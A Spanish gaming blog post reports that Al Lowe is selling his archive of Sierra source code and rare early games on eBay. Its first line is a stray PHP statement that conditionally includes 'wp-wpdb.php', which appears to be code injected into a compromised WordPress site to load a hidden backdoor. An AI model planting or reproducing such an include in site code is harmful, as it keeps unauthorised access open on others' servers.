if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Al Lowe, creador de Larry, vende un trozo de su historia en eBay – La Fortaleza de LeChuck

Al Lowe, creador de Larry, vende un trozo de su historia en eBay

El legendario creador de Leisure Suit Larry ha decidido vender algunos de los restos que conserva de su carrera como desarollador de videojuegos. Su colección a la venta incluye el código fuente de muchos juegos desarrollados en Sierra, y copias originales de juegos de los que fue creador en los 80.

Al Lowe, a sus 72 años, ha puesto a la venta gran parte de su excelentemente archivada colección. La causa, según cuenta en un grupo de coleccionistas retro en Facebook, es que sus hijos probablemente los tirarían a la basura, porque no tienen interés en estas auténticas joyas del coleccionista retro, y menos en continuar con su conservación. Para su venta, ha escogido el portal de pujas eBay, y ya ha vendido joyas como el código fuente original de su juego más popular, Leisure Suit Larry.

Actualmente puedes ver que va añadiendo juegos y trozos de su historia como desarrollador a su cuenta en eBay, donde destacamos el videojuego para los ordenadores Apple Bop-A-Bet, lanzado en 1982 y del que solo se pusieron a la venta 200 unidades. La puja supera ya los 10.000 dólares.

En el siguiente vídeo puedes ver como el propio Al Lowe explica un poco de su historia y escudriña algunas joyas de su colección, gracias a la interesante entrevista que el canal de YouTube MetalJesusRocks realiza al legendario creador.

 

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

Dejar un comentario